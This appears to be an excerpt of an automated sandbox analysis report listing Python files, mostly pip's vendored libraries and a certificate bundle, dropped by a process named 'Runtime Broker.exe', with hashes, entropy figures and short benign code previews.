Preview:	"""Handles all VCS (version control) support"""..from __future__ import absolute_import..import errno.import logging.import os.import shutil.import subprocess.import sys..from pip._vendor import pkg_resources.from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.exceptions import BadCommand, InstallationError, SubProcessError.from pip._internal.utils.compat import console_to_str, samefile.from pip._internal.utils.logging import subprocess_logger.from pip._internal.utils.misc import (. ask_path_exists,. backup_dir,. display_path,. hide_url,. hide_value,. rmtree,.).from pip._internal.utils.subprocess import (. format_command_args,. make_command,. make_subprocess_output_error,. reveal_command_args,.).from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import get_url_scheme..if MYPY_CHECK_RUNNING:. from typing import (. Any,. Dict,. Iterable,. Iterator,. List

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\wheel_builder.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9505
Entropy (8bit):	4.51212845087395
Encrypted:	false
SSDEEP:	192:r1wQh1vB8218ERKFiRKRhXx7lXdgqX6Hol7FiS19G9+Vm:pdu2rbuB7cIfvg
MD5:	725D4E445C08901BE6E8275CE28730CA
SHA1:	3447D55050E213885FEB4FD6F37425CAF809B9ED
SHA-256:	B0BBBC26BCD1259D4A07BF3B9B931F7239EA69D37BBF31BA02511044239565A1
SHA-512:	415BB5118A1B633BCDBA66EBE4B3534FA33302DCB2C0C7CE5FD71F90FB0758B8F54EB10E2BFB649ECBCCC9163DCB3E8E48E913A2FC5090AAE7CBA95C03CF26A7
Malicious:	false
Preview:	"""Orchestrator for building wheels from InstallRequirements.."""..import logging.import os.path.import re.import shutil..from pip._internal.models.link import Link.from pip._internal.operations.build.wheel import build_wheel_pep517.from pip._internal.operations.build.wheel_legacy import build_wheel_legacy.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import ensure_dir, hash_file, is_wheel_installed.from pip._internal.utils.setuptools_build import make_setuptools_clean_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs import vcs..if MYPY_CHECK_RUNNING:. from typing import Any, Callable, Iterable, List, Optional, Tuple.. from pip._internal.cache import WheelCache. from pip._internal.req.req_install import InstallRequirement.. BinaryAllowedPredic

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	4.7123405806532555
Encrypted:	false
SSDEEP:	96:OrHde0hpbiPzsYl1tQdWftXBaIrpZQBid7RbQ/bjXOVSKYg9QMAq8BcQZwyb:Orr5inPQdIRBrpJi
MD5:	3C4B100BB2D81CD4461172902E28A3E5
SHA1:	266CC7878BFD922AAE495FA44F5BB43A92BD6C4A
SHA-256:	4DF71BB1E93FAE915958C9D8A7ABF31A9587B268B004660E9889D45F5346269E
SHA-512:	21985C76FCB78927FC6B38E6442FBB3E222198C02D4A3AA91668D66AAA33D08210D165BB453E64833EBBBAB2B75A1E157DB1081E96A10FB1F3CB65852A4A55A5
Malicious:	false
Preview:	""".pip._vendor is for vendoring dependencies of pip to prevent needing pip to.depend on something external...Files inside of pip._vendor should be considered immutable and should only be.updated to versions from upstream..""".from __future__ import absolute_import..import glob.import os.path.import sys..# Downstream redistributors which have debundled our dependencies should also.# patch this value to be true. This will trigger the additional patching.# to cause things like "six" to be available as pip..DEBUNDLED = False..# By default, look in this directory for a bunch of .whl files which we will.# add to the beginning of sys.path before attempting to import anything. This.# is done to support downstream re-distributors like Debian and Fedora who.# wish to create their own Wheels for our dependencies to aid in debundling..WHEEL_DIR = os.path.abspath(os.path.dirname(__file__))...# Define a small helper function to alias our vendored modules to the real ones.# if the vendored ones do n

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\appdirs.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	25907
Entropy (8bit):	4.680067852693025
Encrypted:	false
SSDEEP:	384:PuAidJVG92Jc6vsIfyk1ZO0cJ4P0fl1+yP9HNrYAto/4HtzfBZ:PuA+8k1M1v95YAto/G
MD5:	C8FEDC011ACED38EE2CC3052E7519006
SHA1:	1693D7AA279C4E1258603C266DA1F133B27D0BF1
SHA-256:	33A218449B5D6609923C25C248C051074553DCFF0C7456D60836D22EB07611B8
SHA-512:	627E872F07B1FB49986D4D757F9389DB60FD3B52CD24F0DE72BCED358A831F7280BC1320D6F9C663000377A9D8C345E4076099AA562235D669FEF3472DF7FF04
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --.# Copyright (c) 2005-2010 ActiveState Software Inc..# Copyright (c) 2013 Eddy Petri.or.."""Utilities for determining application-specific dirs...See <http://github.com/ActiveState/appdirs> for details and usage..""".# Dev Notes:.# - MSDN on where to store app data files:.# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120.# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html.# - XDG spec for Un*x: http://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html..__version__ = "1.4.4".__version_info__ = tuple(int(segment) for segment in __version__.split("."))...import sys.import os..PY3 = sys.version_info[0] == 3..if PY3:. unicode = str..if sys.platform.startswith('java'):. import platform. os_name = platform.java_ver()[3][0]. if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc.. system = 'win32'. elif os_name.st

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	302
Entropy (8bit):	4.543921726473625
Encrypted:	false
SSDEEP:	6:J3hYxO8XNKBuvh0WuqHiIe252HtuDEUuuGE81VyL861VMVg/W1Vh:96xDIBGxuqbe2UHS181j61xW1f
MD5:	E3E73EB5E363077400B40F43003A708A
SHA1:	2A5C6764B7FD4E2AA82C51BDBFC216847CF01F07
SHA-256:	A49B40694C4EB0C3E7CAD2350378EE009917603AFC92B7529EC838620DCE0448
SHA-512:	A4A8E5D77A9CAC94CD67D50D6C5C154C2A83B2A75CFD900A02AB4F64AE18176C5764B0A2A6B4B634A4E1CE17D8AC13E4453296FB645D289D3B9AF69061D06C4E
Malicious:	false
Preview:	"""CacheControl import Interface...Make it easy to import from cachecontrol without long namespaces..""".__author__ = "Eric Larson".__email__ = "eric@ionrock.org".__version__ = "0.12.6"..from .wrapper import CacheControl.from .adapter import CacheControlAdapter.from .controller import CacheController.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\_cmd.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1295
Entropy (8bit):	4.611659913312088
Encrypted:	false
SSDEEP:	24:Xd3mdDqzdcyrd0+/p6BYSefxg4bEnmRNBhQLP0p72egQU9/vFVX9R2StVkIpNC:g64Sxg44naNB2LcBKQU1zuIi
MD5:	BC0ADEA2769C743D6F88F2259900D124
SHA1:	6B9C4A06AEC0D5AEAA6FBE2B56012EEFFA5DDF60
SHA-256:	511184D0AAC0F3B41E9021B74863DAB6548F4F9EF57594C38CD6BE6575F7A437
SHA-512:	5C2F78FFA395A024E193FC2CC65ACFFEE904D7A358F49D1C6F6E3031D34EB5454698CD487E20B691EB9DAE50DA88912B1F7938A130A8A6930C7EB0A9E62CC77C
Malicious:	false
Preview:	import logging..from pip._vendor import requests..from pip._vendor.cachecontrol.adapter import CacheControlAdapter.from pip._vendor.cachecontrol.cache import DictCache.from pip._vendor.cachecontrol.controller import logger..from argparse import ArgumentParser...def setup_logging():. logger.setLevel(logging.DEBUG). handler = logging.StreamHandler(). logger.addHandler(handler)...def get_session():. adapter = CacheControlAdapter(. DictCache(), cache_etags=True, serializer=None, heuristic=None. ). sess = requests.Session(). sess.mount("http://", adapter). sess.mount("https://", adapter).. sess.cache_controller = adapter.controller. return sess...def get_args():. parser = ArgumentParser(). parser.add_argument("url", help="The URL to try and cache"). return parser.parse_args()...def main(args=None):. args = get_args(). sess = get_session().. # Make a request to get a response. resp = sess.get(args.url).. # Turn on logging. setup

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\adapter.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4882
Entropy (8bit):	4.112891979120744
Encrypted:	false
SSDEEP:	48:r6rAtEai73/IEwekDFgCixIoJsItRBUF8BzDHU4wTNpvh035s8erVPadFuQX:r6xwLpg3Ii3Rm81az0Nl
MD5:	3CBAF21152505DD76417624B17890655
SHA1:	B512AC5B2EFA139ED91A0908F6115A50C470B44C
SHA-256:	B12C1A49877DDC821F085538B4E3204A8E9BD8B0ADFE0052690523F24B4914E0
SHA-512:	232BD772728FB3DA04F20DA8D413615FC384F938A448224706304C77654959B7F3B328C08D5A5687D150AEF4B4DFA780C20DD6F3EFE98BD0795C40658D8C37BE
Malicious:	false
Preview:	import types.import functools.import zlib..from pip._vendor.requests.adapters import HTTPAdapter..from .controller import CacheController.from .cache import DictCache.from .filewrapper import CallbackFileWrapper...class CacheControlAdapter(HTTPAdapter):. invalidating_methods = {"PUT", "DELETE"}.. def __init__(. self,. cache=None,. cache_etags=True,. controller_class=None,. serializer=None,. heuristic=None,. cacheable_methods=None,. args,. kw. ):. super(CacheControlAdapter, self).__init__(args, kw). self.cache = DictCache() if cache is None else cache. self.heuristic = heuristic. self.cacheable_methods = cacheable_methods or ("GET",).. controller_factory = controller_class or CacheController. self.controller = controller_factory(. self.cache, cache_etags=cache_etags, serializer=serializer. ).. def send(self, request, cacheable_methods=None, kw):.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	805
Entropy (8bit):	4.40515156892529
Encrypted:	false
SSDEEP:	24:WcBrrr8P4lmPT28PQ0t7AaXCKrwqlv12HqHP:WcRrtlkthFSKcqlv18qHP
MD5:	4F8FB4E0C5A2DFECED775161D9D1093E
SHA1:	3926A34BADF2B409A322FAE8A8732DFB57F689F4
SHA-256:	D5F738C093FC1D8B75C9C9C95DE130E690A97812F60AAC71EA0F456F40180D64
SHA-512:	8410FBF53B6F1C27157332F44C80C18C1F599F60C77D467FD9EE9C514C0EAACD961A11F1E7D51D4C4F9453DF6893C33DAA2D170DCF913DEED24EB53EE98D4A3D
Malicious:	false
Preview:	""".The cache object API for implementing caches. The default is a thread.safe in-memory dictionary..""".from threading import Lock...class BaseCache(object):.. def get(self, key):. raise NotImplementedError().. def set(self, key, value):. raise NotImplementedError().. def delete(self, key):. raise NotImplementedError().. def close(self):. pass...class DictCache(BaseCache):.. def __init__(self, init_dict=None):. self.lock = Lock(). self.data = init_dict or {}.. def get(self, key):. return self.data.get(key, None).. def set(self, key, value):. with self.lock:. self.data.update({key: value}).. def delete(self, key):. with self.lock:. if key in self.data:. self.data.pop(key).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\caches\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.270181289556029
Encrypted:	false
SSDEEP:	3:1LDIA6lbQS+FGQLXk9VAFbQf1NAGg:1LD96lbQS+FGQLXaAFbQf1NAGg
MD5:	D701625642C107D45585A59770E2EAB5
SHA1:	1A86DF17C7C2D28865BBB89F804BA70E8BA22869
SHA-256:	FA01CD298BDA783D243A4E4CEF878EAEC4A020A52D0BA8BA19F6E6BA01B0784A
SHA-512:	A21C552B350BCB262EB87D1CC0A4AF3409ECBB6F7D3EBEB162AA600121FC8834448CA54F043CFD4C59BDA7AFD5BC694591548AA6FDD82CCDC23E715644B20F96
Malicious:	false
Preview:	from .file_cache import FileCache # noqa.from .redis_cache import RedisCache # noqa.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\caches\file_cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4153
Entropy (8bit):	4.40282389102342
Encrypted:	false
SSDEEP:	96:SuJPKVC6+gjZRGpxQLdzPqfMBRk68CiT3EdgQgN617:fJi+YS4LdzPcMrkTNW7
MD5:	52F2DFCB0252B36CC64A980F6F17CB49
SHA1:	F86F2161F9D70E870DC4A0428EEC7AD0FD8D2336
SHA-256:	9D854AB09B5787A8095EF767D625B2AE1C6F930A50ACAF9E2A8311CEE8B090A9
SHA-512:	54467DF562702CD09F4496B9289555CEF93BBFB4BA410750EF0EF145D6A7DA0079C4953CB317456EAF9EA1D7388DB246A8194D0D0D29AEEAD5B53F17AF17C1C2
Malicious:	false
Preview:	import hashlib.import os.from textwrap import dedent..from ..cache import BaseCache.from ..controller import CacheController..try:. FileNotFoundError.except NameError:. # py2.X. FileNotFoundError = (IOError, OSError)...def _secure_open_write(filename, fmode):. # We only want to write to this file, so open it in write only mode. flags = os.O_WRONLY.. # os.O_CREAT \| os.O_EXCL will fail if the file already exists, so we only. # will open new files.. # We specify this because we want to ensure that the mode we pass is the. # mode of the file.. flags \|= os.O_CREAT \| os.O_EXCL.. # Do not follow symlinks to prevent someone from making a symlink that. # we follow and insecurely open a cache file.. if hasattr(os, "O_NOFOLLOW"):. flags \|= os.O_NOFOLLOW.. # On Windows we'll mark this file as binary. if hasattr(os, "O_BINARY"):. flags \|= os.O_BINARY.. # Before we open our file, we want to delete any existing file that is. # there.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\caches\redis_cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	856
Entropy (8bit):	4.3081780407432495
Encrypted:	false
SSDEEP:	24:1Rhthdxt7AAF5r5LyafWRNm/ARBR2win81KZ:PhtJhz5NyafWNm/0BR51KZ
MD5:	3908DF2A953761687424BF13A0646993
SHA1:	76797756618215A069ABBF6821A448404CDA2EE0
SHA-256:	1F17A5329342A3E758AF67E2243C0CDE1861466C5462D079B579B51A90004F86
SHA-512:	E0CA5FFBFEEFD6EE978B52E5729872699E9328F2CE40EA6797B17918E340D23085191A2CC5CACC8F17512E615EF1D3291DF37E8463F0DAB287E75ABC919D79F8
Malicious:	false
Preview:	from __future__ import division..from datetime import datetime.from pip._vendor.cachecontrol.cache import BaseCache...class RedisCache(BaseCache):.. def __init__(self, conn):. self.conn = conn.. def get(self, key):. return self.conn.get(key).. def set(self, key, value, expires=None):. if not expires:. self.conn.set(key, value). else:. expires = expires - datetime.utcnow(). self.conn.setex(key, int(expires.total_seconds()), value).. def delete(self, key):. self.conn.delete(key).. def clear(self):. """Helper for clearing all the keys in a database. Use with. caution!""". for key in self.conn.keys():. self.conn.delete(key).. def close(self):. """Redis uses connection pooling, no need to close the connection.""". pass.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	695
Entropy (8bit):	4.555739599945941
Encrypted:	false
SSDEEP:	12:cv5LBRwN65oxdRRwcxAfDzRgVeLCJJcpxA88AWwRwl6WJgpxA88xFmhRwlHFmXDK:c9vwH/wjRgVeLfp286Mwlfip28JPwlgO
MD5:	79816562EAA066C6A62B1EC796100E27
SHA1:	E6F4464622B4378B394BF497F04AFD373E2DD994
SHA-256:	90736F31176DEACFD7C2AABFF6A266AFDA2EDF060C38C50CC4F3DCC0DC53F0C7
SHA-512:	DF37ED977A185087B39FCCF812DEAA656F183056B6A30DDEE232E54A03E78E5C408A410A3E37A8A66B3DCE18196EC53B1BD716503228A520570F01BF3C465F34
Malicious:	false
Preview:	try:. from urllib.parse import urljoin.except ImportError:. from urlparse import urljoin...try:. import cPickle as pickle.except ImportError:. import pickle...# Handle the case where the requests module has been patched to not have.# urllib3 bundled as part of its source..try:. from pip._vendor.requests.packages.urllib3.response import HTTPResponse.except ImportError:. from pip._vendor.urllib3.response import HTTPResponse..try:. from pip._vendor.requests.packages.urllib3.util import is_fp_closed.except ImportError:. from pip._vendor.urllib3.util import is_fp_closed..# Replicate some six behaviour.try:. text_type = unicode.except NameError:. text_type = str.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\controller.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	14149
Entropy (8bit):	4.323889574133824
Encrypted:	false
SSDEEP:	192:ODeshG6jVqOV5Je1hwTaSEXdENa7JWMEVhBZReiL7gtc6y:OSs3jVqgrlct4MEVhBZRegec6y
MD5:	4AD4B9741324E27BB944D9E9F7C0BE39
SHA1:	557FCCE4E2DB89CC7BF77310514C4E7555C98E9A
SHA-256:	096117DE979D20CF6CEB4B2E7F8CD93ED9BF26F5609EFA203062BF3A2046E45F
SHA-512:	DF9350CD800CE513A460F68E419D7642D5B81A42A1F17D3A6EEE57F396D01CF1D42E03E7B73E4FB33D648EC7DCDB846B08A1280F1B14DFB1A331C6C52CC1804E
Malicious:	false
Preview:	""".The httplib2 algorithms ported for use with requests..""".import logging.import re.import calendar.import time.from email.utils import parsedate_tz..from pip._vendor.requests.structures import CaseInsensitiveDict..from .cache import DictCache.from .serialize import Serializer...logger = logging.getLogger(__name__)..URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]))?([^?#])(\?([^#]))?(#(.))?")...def parse_uri(uri):. """Parses a URI using the regex given in Appendix B of RFC 3986... (scheme, authority, path, query, fragment) = parse_uri(uri). """. groups = URI.match(uri).groups(). return (groups[1], groups[3], groups[4], groups[6], groups[8])...class CacheController(object):. """An interface to see if request should cached or not.. """.. def __init__(. self, cache=None, cache_etags=True, serializer=None, status_codes=None. ):. self.cache = DictCache() if cache is None else cache. self.cache_etags = cache_etags. self.serialize

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\filewrapper.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2533
Entropy (8bit):	4.329459724298569
Encrypted:	false
SSDEEP:	48:P5w8xH3IkNaXyz76G5Md0YS8T+OduSKaHLFHEPJcBLG:RwqOPGOVKtn
MD5:	B9AD2B26822F199F30A96FD03EDABD4E
SHA1:	C01F5F2C08EF189E53F06974DA14AC24DACFD423
SHA-256:	BC008A3BC2E5CEEFD95B28D5D45C67D4C0384C653AD0DE4DDC64AB0057406364
SHA-512:	3B2C671F7011A6B3EAC4715ED46984DC238AF25E415A3D5C6681839098F649604A918BD34F4565E8FD9E697C1FA1E8F7498780946FC731BAB505B9459A0CE4E9
Malicious:	false
Preview:	from io import BytesIO...class CallbackFileWrapper(object):. """. Small wrapper around a fp object which will tee everything read into a. buffer, and when that file is closed it will execute a callback with the. contents of that buffer... All attributes are proxied to the underlying file object... This class uses members with a double underscore (__) leading prefix so as. not to accidentally shadow an attribute.. """.. def __init__(self, fp, callback):. self.__buf = BytesIO(). self.__fp = fp. self.__callback = callback.. def __getattr__(self, name):. # The vaguaries of garbage collection means that self.__fp is. # not always set. By using __getattribute__ and the private. # name[0] allows looking up the attribute value and raising an. # AttributeError when it doesn't exist. This stop thigns from. # infinitely recursing calls to getattr in the case where. # self.__fp hasn't been set.. #.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\heuristics.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4070
Entropy (8bit):	4.604582915231379
Encrypted:	false
SSDEEP:	48:2yt5QkjJH43Zb50c21DrgoRjoNwz1jJKDQ/6nD9LwZn17dvozmurr+AoS:2nIt43qtdjEq6Dp4MzlR
MD5:	D8978A4C3CEE99FD30F03F8B6C5300B7
SHA1:	5A4CD0465EBB9168E80DDD6BD7DABC8A8A7C48D2
SHA-256:	045187277C90731BD98B37E8F742CB674E13FD9E574825EF168B6BA7B52CD2C7
SHA-512:	0D8AC3E9C4E26DF9A79FD11599FE07528C8696595D3F1671BF674ABA1F2ED9312F65C93A7EEECE0F49BF4F5D7A9BF0CFFD1F86E40C38BB67F5E0418C7AA231E1
Malicious:	false
Preview:	import calendar.import time..from email.utils import formatdate, parsedate, parsedate_tz..from datetime import datetime, timedelta..TIME_FMT = "%a, %d %b %Y %H:%M:%S GMT"...def expire_after(delta, date=None):. date = date or datetime.utcnow(). return date + delta...def datetime_to_header(dt):. return formatdate(calendar.timegm(dt.timetuple()))...class BaseHeuristic(object):.. def warning(self, response):. """. Return a valid 1xx warning header value describing the cache. adjustments... The response is provided too allow warnings like 113. http://tools.ietf.org/html/rfc7234#section-5.5.4 where we need. to explicitly say response is over 24 hours old.. """. return '110 - "Response is Stale"'.. def update_headers(self, response):. """Update the response headers with any new headers... NOTE: This SHOULD always include some Warning header to. signify that the response was cached by the client,

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\serialize.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7091
Entropy (8bit):	4.3482659863657025
Encrypted:	false
SSDEEP:	192:A7siRxm4/2X35lotCJJYCits09/eZZuy2:ANxm0Ca9eZR2
MD5:	E8486E48B081348A4265286695B289DA
SHA1:	852D73ECA5E3DCB062F8F7D019FBA7A6135B2C17
SHA-256:	BC86B88EFAB8C7F29238B74421E7689275F669760742E8CB0C5578F85DB50E7A
SHA-512:	92E205DDB957076C7EFBAAF00571BF0CC54EA5371820C8D3B9E2D1C5C1D967C6849AA6B71335E76E66D899C135D1FA437F3EB7A2EBF2E6E14713BFB4F5E2776E
Malicious:	false
Preview:	import base64.import io.import json.import zlib..from pip._vendor import msgpack.from pip._vendor.requests.structures import CaseInsensitiveDict..from .compat import HTTPResponse, pickle, text_type...def _b64_decode_bytes(b):. return base64.b64decode(b.encode("ascii"))...def _b64_decode_str(s):. return _b64_decode_bytes(s).decode("utf8")...class Serializer(object):.. def dumps(self, request, response, body=None):. response_headers = CaseInsensitiveDict(response.headers).. if body is None:. body = response.read(decode_content=False).. # NOTE: 99% sure this is dead code. I'm only leaving it. # here b/c I don't have a test yet to prove. # it. Basically, before using. # `cachecontrol.filewrapper.CallbackFileWrapper`,. # this made an effort to reset the file handle. The. # `CallbackFileWrapper` short circuits this code by. # setting the body as t

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\cachecontrol\wrapper.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	690
Entropy (8bit):	4.323772906516226
Encrypted:	false
SSDEEP:	12:1Q61PQcdG1P+/jJ7jUHJrKvVTj+G2Vq8ON3sLYxWj+jJw8W2fAYxzz9E:1QqzYB+/l0HAVTj+G2Vq8y3sLVX2Rxze
MD5:	C08B34AF68D7BC55FFB6C7B07B21B2D7
SHA1:	7CB313EE19C80C927F4CDC26F1C776AF3A15B57E
SHA-256:	E4B5F4B89C2435052D612130DDA1A61AEF5663CC068A977CD6627C946D1DD0CE
SHA-512:	FE07C6266425285E2FF3FFA663FEB9E8122D94F6135CE2EAB621B8C71603652316CE07B2303EE4DAFF81F19D778618698D757F0EAAB47EB0B38489C8CAEB4509
Malicious:	false
Preview:	from .adapter import CacheControlAdapter.from .cache import DictCache...def CacheControl(. sess,. cache=None,. cache_etags=True,. serializer=None,. heuristic=None,. controller_class=None,. adapter_class=None,. cacheable_methods=None,.):.. cache = DictCache() if cache is None else cache. adapter_class = adapter_class or CacheControlAdapter. adapter = adapter_class(. cache,. cache_etags=cache_etags,. serializer=serializer,. heuristic=heuristic,. controller_class=controller_class,. cacheable_methods=cacheable_methods,. ). sess.mount("http://", adapter). sess.mount("https://", adapter).. return sess.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\certifi\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.403984472669863
Encrypted:	false
SSDEEP:	3:1LGzbQbAwLSkJXLv7:1LcQbjJ7
MD5:	1851170953B61D0A5BC9CD4E44E6372E
SHA1:	C49F24EB06DB92C5B7301AECAF43202DDFA2C083
SHA-256:	4E87017C7AEA02440AF755B98CD621447F0A2A2CF19245D9064EBC0D31E3D31A
SHA-512:	490DEA268E349563A93C377607444E88594C5A15CCD2FFF698162C2D2F510285BCF164D9A85BD6D364B3AAC4CBD1F837A3AD70D39E3BB56B6E0ACA711FAAF431
Malicious:	false
Preview:	from .core import contents, where..__version__ = "2020.11.08".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\certifi\__main__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	255
Entropy (8bit):	4.488945307809837
Encrypted:	false
SSDEEP:	6:JW6rdruXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWcdrCQYWuSZWFdQhu
MD5:	49689CF432641C277156F1B5E119BB03
SHA1:	94DE655E7E05B44B77EFBB710287FE7AC57BFE4E
SHA-256:	D64DC2AFDE6F0B1C464460E58EB5B7C0C76965D2F73617F4BB59FE936A9DB026
SHA-512:	88850F5DF40F8D51920E4F12632CB4E7A96C8F76E7737A058F74239C7A0C27F4A30187C64EDB4890B5156CC44AC4D567E95CA5734D4B0C1FA49F153E6989E6E0
Malicious:	false
Preview:	import argparse..from pip._vendor.certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\certifi\cacert.pem Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	281608
Entropy (8bit):	6.051233953522065
Encrypted:	false
SSDEEP:	6144:f3fLXdA7U58f9ZKlWm5plXqXCRrcMBHADwYCuMslip:f3TS7xZa5LACRrcMOb8
MD5:	712A0C9E3337EDC7F4C6C36A67727866
SHA1:	CD0CC7F28F7C8AEFEA6F54F392C7BD68ACACF572
SHA-256:	53B8854F8FE7FBB5C27C7A5CF08E3A69DE641EE1AF0D279D95AD9F75B428414A
SHA-512:	2183F4EAF351E500054039EECABF76DF00C1FD66D777AC7CFFAB841BCBF6A60673D138C550B6E73BC80C5C7A162F399E4A6A62B120841DF2902313CB747B14C6
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\certifi\core.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2315
Entropy (8bit):	4.516685595944803
Encrypted:	false
SSDEEP:	48:bpq/kD5+zZ0bY7eu7DDMQT/RKa8q8wJZBprf0vk:g/kdjbY7xDtRKfVwrBprfCk
MD5:	6AE9A410D9F4667F3FBE9C709E1450E3
SHA1:	674487C99994C6AA22C18503E9C4E6573B239903
SHA-256:	8C1AF02845A91B420A72EA332B4050D871C6A7C69D5C03B204F0BB75D811EAF3
